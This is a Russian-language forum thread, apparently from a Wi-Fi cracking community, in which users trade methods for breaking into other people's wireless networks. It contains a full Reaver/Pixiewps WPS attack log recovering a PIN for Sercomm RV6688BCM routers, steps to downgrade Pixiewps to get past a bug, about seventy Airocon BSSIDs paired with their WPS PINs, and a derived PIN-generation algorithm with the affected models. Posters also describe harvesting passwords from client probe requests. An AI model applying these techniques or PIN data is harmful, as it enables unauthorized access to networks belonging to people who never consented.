Это пытался подключиться Андрюша перебирая сети. Не все так просто . ведь прослушивания mitm или arp все же небыло. - хоть , что то понять Я же говорю , начни с ручного режима
Ручной режим уже в процессе, хендшейк словлен и брутится. Согласен, не все так просто. Но к трем точкам пароль словил именно так! Рекомендую попробовать...
Скорее всего просто удачное совпадение, вбивали пароль вместо имени сети по ошибке. Но стоит взять на заметку, как вариант.
За два дня работы airodumpa таким способом открыл 5 точек. Это при том, что сканировал эфир в двух местах - дома и на работе. Так что это точно не случайность. Уже работаю над таблицей ассоциации точек и клиентов. По сути, в скане фиксируются любые устройства, попадающие в зону действия моего адаптера, пытающиеся подключиться к известным им сетям и передающие пароль в качестве своего ID.
Сегодня получил из Китая адаптер Kasens N9600. Попытался снова пройтись ривером по этой точке из Kali 2.0 и WifiSlax - снова ничего: wifislax гоняет по кругу один и тот же пин, кали также неправильно определяет первую половину пина. Наудачу попробовал софт "изкаробки" - тут прилагается Xiaopan OS для загрузки с диска или виртуалки. Прикрутил на виртуалку и ... о, чудо! minidwep уверенно так сбрутил первую часть, сейчас уже прошел 93%.
Если не залипнет на 99% гоняя один и тот же ПИН отпишитесь.На самом деле может показаться, что первая часть подобрана, в итоге все печально.
Мда, рано радовался. Все те же грабли. Первая часть якобы подобралась, вторая дошла до 99% и зациклилась. Запустил все заново, первая часть пина определилась иначе. Все, как сказал Triton_Mgn, печально...
После перехода на Kali Linux 2016.1 обнаружил что теперь Pixiewps версии 1.2 не может подобрать пин к роутерам Sercomm серии RV6688BCM. Но до данным из Reaver в Pixiewps 1.1 с ключем -f можно подобрать пин, например: Spoiler: Пример Code: root@2016:~# reaver -i wlan5mon -b D4:21:22:ХХ:ХХ:ХХ -c 12 -vv -K 1 Reaver v1.5.2 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> mod by t6_x <[email protected]> & DataHead & Soxrok2212 [+] Switching wlan5mon to channel 12 [+] Waiting for beacon from D4:21:22:ХХ:ХХ:ХХ [+] Associated with D4:21:22:ХХ:ХХ:ХХ (ESSID: GPONXXXX) [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000 [+] Trying pin 12345670. [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [P] E-Nonce: 3f:ba:49:b9:18:66:0b:7d:60:e0:03:38:5e:67:09:8a [P] PKE: bc:6a:46:e6:db:51:d0:8a:72:57:30:6d:db:cf:0f:0f:b2:57:9b:fc:04:c8:06:23:11:58:63:9a:c3:38:84:29:b3:cd:bc:80:24:d7:d2:51:0d:cb:f4:cf:97:15:23:03:ca:ea:f0:0c:8b:c6:d2:be:d9:68:b0:68:4d:c4:ed:46:a3:07:8b:e8:ac:f9:94:6c:22:c0:29:e5:0e:6d:50:95:ba:77:0d:0f:ca:79:22:23:3f:bc:6b:36:84:15:1b:d2:71:57:8e:1c:27:df:16:a7:72:b3:1f:56:cc:01:20:28:fe:ff:77:96:7f:54:a0:ac:a8:33:13:b8:cc:70:6f:76:af:5b:fc:a1:39:3d:14:b7:cd:59:91:23:2b:52:1b:d8:f1:49:73:79:d8:4c:18:72:18:6f:3f:b8:82:28:1a:ee:f2:e1:0f:c6:e4:9f:14:15:0e:02:73:38:79:f9:68:de:46:c2:e6:63:d7:7b:0c:bd:32:79:56:53:38:cc:ee:7f [P] WPS Manufacturer: SERCOMM [P] WPS Model Name: RV6688BCM [P] WPS Model Number: RV6688BCM [P] Access Point Serial Number: 534534534534534 [+] Received M1 message [P] R-Nonce: 04:11:4c:fe:a6:47:49:5b:db:3e:bb:4b:2f:a3:3b:f6 [P] PKR: c1:0e:11:3e:1b:b9:18:3b:10:6d:19:b8:f5:f0:d0:5f:3f:4a:5c:ba:70:d1:6a:6b:e0:de:c8:25:f2:4c:11:a8:b1:5d:de:e9:39:f3:2b:8b:64:aa:d5:a8:39:d4:ee:3f:01:76:38:63:25:92:fb:35:de:b5:b8:18:cb:f5:0c:9a:29:ca:6b:33:35:d1:88:79:1f:f1:24:0d:f6:03:75:ca:ac:e3:13:f2:5c:65:84:29:05:44:76:91:f5:88:62:4a:b3:b2:8d:8c:bd:7e:ce:c2:89:54:ab:37:51:f1:d3:11:b6:a3:a4:51:b6:7b:25:67:22:34:0f:8e:be:33:2d:e2:95:62:92:11:d1:a7:2f:6e:ee:68:b8:d0:ef:e8:d1:68:27:04:75:29:c7:d8:fc:ab:dd:3a:3f:ce:fc:bd:06:1b:fa:a4:97:a6:f8:48:92:da:65:d5:74:df:d0:15:d2:87:73:c5:0c:f3:37:5d:2b:1f:8f:52:69:34:79:50:9d:17 [P] AuthKey: 98:97:ef:02:34:7a:6e:3f:41:ef:c9:05:77:69:8d:fb:39:69:4d:5f:ab:5c:a4:69:47:7f:cf:1e:d5:c2:37:60 [+] Sending M2 message [P] E-Hash1: 93:35:fb:40:cd:3b:83:86:94:d1:ff:29:73:09:8b:ce:cb:7a:1a:5a:a4:69:c7:dc:06:f1:af:d0:a5:24:34:e1 [P] E-Hash2: ea:3c:02:f7:95:41:4d:66:31:e1:2c:7c:53:5e:80:51:7a:67:48:04:37:e9:63:99:8b:42:0c:6b:d0:e5:da:ce [Pixie-Dust] [Pixie-Dust] Pixiewps 1.2 [Pixie-Dust] [Pixie-Dust] [-] WPS pin not found! [Pixie-Dust] [Pixie-Dust] [*] Time taken: 0 s 361 ms [Pixie-Dust] root@kali2:~# pixiewps -f -e bc:6a:46:e6:db:51:d0:8a:72:57:30:6d:db:cf:0f:0f:b2:57:9b:fc:04:c8:06:23:11:58:63:9a:c3:38:84:29:b3:cd:bc:80:24:d7:d2:51:0d:cb:f4:cf:97:15:23:03:ca:ea:f0:0c:8b:c6:d2:be:d9:68:b0:68:4d:c4:ed:46:a3:07:8b:e8:ac:f9:94:6c:22:c0:29:e5:0e:6d:50:95:ba:77:0d:0f:ca:79:22:23:3f:bc:6b:36:84:15:1b:d2:71:57:8e:1c:27:df:16:a7:72:b3:1f:56:cc:01:20:28:fe:ff:77:96:7f:54:a0:ac:a8:33:13:b8:cc:70:6f:76:af:5b:fc:a1:39:3d:14:b7:cd:59:91:23:2b:52:1b:d8:f1:49:73:79:d8:4c:18:72:18:6f:3f:b8:82:28:1a:ee:f2:e1:0f:c6:e4:9f:14:15:0e:02:73:38:79:f9:68:de:46:c2:e6:63:d7:7b:0c:bd:32:79:56:53:38:cc:ee:7f -r c1:0e:11:3e:1b:b9:18:3b:10:6d:19:b8:f5:f0:d0:5f:3f:4a:5c:ba:70:d1:6a:6b:e0:de:c8:25:f2:4c:11:a8:b1:5d:de:e9:39:f3:2b:8b:64:aa:d5:a8:39:d4:ee:3f:01:76:38:63:25:92:fb:35:de:b5:b8:18:cb:f5:0c:9a:29:ca:6b:33:35:d1:88:79:1f:f1:24:0d:f6:03:75:ca:ac:e3:13:f2:5c:65:84:29:05:44:76:91:f5:88:62:4a:b3:b2:8d:8c:bd:7e:ce:c2:89:54:ab:37:51:f1:d3:11:b6:a3:a4:51:b6:7b:25:67:22:34:0f:8e:be:33:2d:e2:95:62:92:11:d1:a7:2f:6e:ee:68:b8:d0:ef:e8:d1:68:27:04:75:29:c7:d8:fc:ab:dd:3a:3f:ce:fc:bd:06:1b:fa:a4:97:a6:f8:48:92:da:65:d5:74:df:d0:15:d2:87:73:c5:0c:f3:37:5d:2b:1f:8f:52:69:34:79:50:9d:17 -s 93:35:fb:40:cd:3b:83:86:94:d1:ff:29:73:09:8b:ce:cb:7a:1a:5a:a4:69:c7:dc:06:f1:af:d0:a5:24:34:e1 -z ea:3c:02:f7:95:41:4d:66:31:e1:2c:7c:53:5e:80:51:7a:67:48:04:37:e9:63:99:8b:42:0c:6b:d0:e5:da:ce -a 98:97:ef:02:34:7a:6e:3f:41:ef:c9:05:77:69:8d:fb:39:69:4d:5f:ab:5c:a4:69:47:7f:cf:1e:d5:c2:37:60 -n 3f:ba:49:b9:18:66:0b:7d:60:e0:03:38:5e:67:09:8a Pixiewps 1.1 [*] E-S1: 6e:45:5d:f1:0d:bd:51:e6:48:20:63:f3:08:2c:b5:76 [*] E-S2: 6e:45:5d:f1:0d:bd:51:e6:48:20:63:f3:08:2c:b5:76 [+] WPS pin: 86863032 [*] Time taken: 0 s Подскажите, каким образом можно "выдернуть" Pixiewps 1.1 из Kali 2.0 и запустить на Kali 2016.1?
Грамотнее запостить это в трекер на гитхабе: https://github.com/t6x/reaver-wps-fork-t6x/issues Потому как это в явном виде баг.
В целом да, может быть ещё правильнее написать ему. Но последний коммит у него был в начале года, так что может он отреагирует не столь быстро.
Следил по Вашим советам за подписями ассоциаций. У меня выскочило, цитирую дословно - "мне жалко WIFI". Я присел, хотя и сидел!
Подтверждаю данный баг. А я аж удивился: думал "ну неужели в МГТС о таких вещах думают и прошивку новую выпустили, где эта уязвимость пофикшена". Чтобы поставить старый pixiewps, удали тот, что есть сейчас Code: apt-get remove pixiewps добавь данный репозиторий в /etc/apt/sources.list Code: deb http://old.kali.org/kali moto main non-free contrib и выполни команды Code: apt-get update apt-get install pixiewps затем удали или закомменти строчку с этим репозиторием и снова Code: apt-get update А вообще можно указывать версию приложения, только я не помню полное название версии 1.1-0kali1 или как-то так, т. е. Code: apt-get install pixiewps=версия
Заметил тут, что некоторые роутеры Airocon имеют похожие WPSPIN. Например: Spoiler: BSSID - WPSPIN Code: F4:3E:61:8C:96:47 69701566 F4:3E:61:8C:98:1D 69721366 F4:3E:61:8C:98:93 69729164 F4:3E:61:8C:98:CC 69726866 F4:3E:61:8C:98:F8 69720260 F4:3E:61:8C:99:16 69735660 F4:3E:61:8C:99:26 69731266 F4:3E:61:8C:99:37 69738968 F4:3E:61:8C:99:AD 69736766 F4:3E:61:8C:99:E2 69739064 F4:3E:61:8C:9A:70 69746666 F4:3E:61:8C:9A:AF 69749964 F4:3E:61:8C:9A:BB 69741166 F4:3E:61:8C:9B:3A 69753268 F4:3E:61:8C:9B:4F 69754364 F4:3E:61:8C:9B:7F 69752162 F4:3E:61:8C:9B:A1 69756566 F4:3E:61:8C:9B:F2 69757662 F4:3E:61:8C:9C:34 69768668 F4:3E:61:8C:9C:87 69761966 F4:3E:61:8C:9C:B8 69760860 F4:3E:61:8C:9D:08 69775260 F4:3E:61:8C:9E:1F 69789564 F4:3E:61:8C:9E:51 69789564 F4:3E:61:8C:9E:89 69785160 F4:3E:61:8C:9E:8A 69786266 F4:3E:61:8C:9E:D1 69787362 F4:3E:61:8C:9E:EE 69786266 F4:3E:61:8C:9F:28 69799464 F4:3E:61:8C:9F:59 69798368 F4:3E:61:8C:9F:73 69794964 F4:3E:61:8C:9F:73 69794964 F4:3E:61:8C:A0:20 69702662 F4:3E:61:8C:A0:4F 69709364 F4:3E:61:8C:A0:6B 69707162 F4:3E:61:8C:A0:88 69706066 F4:3E:61:8C:A0:B1 69707162 F4:3E:61:8C:A0:D1 69709364 F4:3E:61:8C:A0:F3 69703768 F4:3E:61:8C:A2:8C 69722462 F4:3E:61:8C:A2:99 69725760 F4:3E:61:8C:A3:5C 69735660 F4:3E:61:8C:A3:E4 69731266 F4:3E:61:8C:A3:F5 69738968 F4:3E:61:8C:A4:3A 69742262 F4:3E:61:8C:A4:6B 69741166 F4:3E:61:8C:A4:FD 69747762 F4:3E:61:8C:A5:1A 69751066 F4:3E:61:8C:A5:34 69757662 F4:3E:61:8C:A5:78 69755460 F4:3E:61:8C:A5:9B 69750960 F4:3E:61:8C:A5:DC 69755460 F4:3E:61:8C:A6:32 69766466 F4:3E:61:8C:A6:60 69762062 F4:3E:61:8C:A6:D5 69769764 F4:3E:61:8C:A6:F9 69765360 F4:3E:61:8C:A7:24 69773068 F4:3E:61:8C:A7:64 69777462 F4:3E:61:8C:A7:69 69772962 F4:3E:61:8C:A7:8B 69776366 F4:3E:61:8C:A7:94 69775260 F4:3E:61:8C:A8:5E 69782862 F4:3E:61:8C:A8:85 69781766 F4:3E:61:8C:A8:8B 69787362 Немного повозившись, пришёл к такому алгоритму: Code: BSSID = "OCT1:OCT2:OCT3:OCT4:OCT5:OCT6" WPSPIN = "abcdefgs" a = (OCT1 + OCT2) % 10 b = (OCT2 + OCT3) % 10 c = (OCT3 + OCT4) % 10 d = (OCT4 + OCT5) % 10 e = (OCT5 + OCT6) % 10 f = (OCT6 + OCT1) % 10 g = (OCT1 + OCT2) % 10 s = WpsPinChecksum Spoiler: Список устройств Code: 481 Airocon RTL867x ADSL Modem, firmware: RTK V2.1.1 480 Airocon ENKOM A7900/A7901, firmware: R8672 IPv6 Hdr 4WNE1 5.6R 193 Airocon Wireless Router 107 Airocon Eltek A7900, firmware: R8672_IPv6_HADARA_4PWNE1_5AR_16M_0409_1444 104 Airocon Intercross 4PW, firmware: V2.1 51 Airocon DG-HR3400 39 Airocon DG-HR1400 39 Airocon ENKOM A7900/A7901, firmware: R8672 IPv6 Hdr 4WNE1 5.5R 32 Airocon GD-W810N/ND, firmware: GOLDWEB_V1.0 20 Airocon Eltek A7900, firmware: R8672_IPv6_HADARA_4PWNE1_5CR_16M_0520_1541 19 Airocon QW365n, firmware: QW365n V2.1.1 14 Airocon Intercross 4PW, firmware: GAW9.5Z97-4-IC.MGTS-R3B112-RU.EN 13 Airocon Eltek A7900, firmware: R8672_IPv6_HADARA_4PWNE1_5AR_16M_0409_1531 13 Airocon WLAN ADSL2+ Router, firmware: RTK V2.1.1 12 Airocon Acorp Sprinter@ADSL W510N, firmware: R8676 IPv6 Acp 4WNE1 5.7R 10 Airocon WELL DA-150N, firmware: RTK V2.1.1 9 Airocon AD1504-1T1R, firmware: RTK V2.1.1 8 Airocon GD-W710G, firmware: GOLDWEB_V1.0 7 Airocon AM241W, firmware: RNR4-A1-2x16_v2110831_DS1W_02_130628 7 Airocon JDR4150WN, firmware: RTK V2.1.1 7 Airocon SpeedSurf 504AN, firmware: GAN9.8U26-4-TX-R4B016-PH.EN 6 Airocon AD1501-1T1R, firmware: RTK V2.1.1 5 Airocon Acorp Sprinter@ADSL W520N, firmware: R8676 IPv6 Acp 4WNE2 5.7R 5 Airocon WR4-DP9110, firmware: RTK V2.1.1 4 Airocon DG-BG4300N, firmware: R8676_IPv6_DIGISOL_4PWNE2_5CR_16M_1017_1523 4 Airocon RTL8671 ADSL Modem, firmware: RTK V2.1.1 4 Airocon WJ747, firmware: BroadKam_V1.0 2 Airocon 1.00 2 Airocon DG-HR3300 2 Airocon MC-AWR11, firmware: MODECOM_V1.0 2 Airocon PROLiNK H5001NS ADSL Wireless Modem, firmware: R8672_IPv6_VNPT_1PWNE1_5BR_16M_0509_1550 2 Airocon WIFI-2000 N150-A, firmware: V2.1.1 1 Airocon AIR-BGN1100 1 Airocon DG-BG4300N, firmware: R8676 IPv6 Dgs 4WNE2 5.8R 1 Airocon DG-HR1400, firmware: 1.00.02 1 Airocon Eltek A7900, firmware: R8672_IPv6_HADARA_4PWNE1_5AR_16M_0322_1530 1 Airocon H50212, firmware: RTK V2.1.1 1 Airocon IP-WDL-RT1T1R, firmware: V2.1.1 1 Airocon Intercross 4PW, firmware: Gaw9B.5Z97-4-IC.MGTS2-R3B011-RU.EN 1 Airocon TAD-110, firmware: V2.1.1 1 Airocon TAD-411, firmware: V2.1.1 1 Airocon Virtual Web Router 1 Airocon WELL DA-300N, firmware: RTK V2.1.1
Frame type Filter Management frames wlan.fc.type eq 0 Control frames wlan.fc.type eq 1 Data frames wlan.fc.type eq 2 Frame subtype Filter Association request wlan.fc.type_subtype eq 0 Association response wlan.fc.type_subtype eq 1 Probe request wlan.fc.type_subtype eq 4 Probe response wlan.fc.type_subtype eq 5 Beacon wlan.fc.type_subtype eq 8 Authentication wlan.fc.type_subtype eq 11 Deauthentication wlan.fc.type_subtype eq 12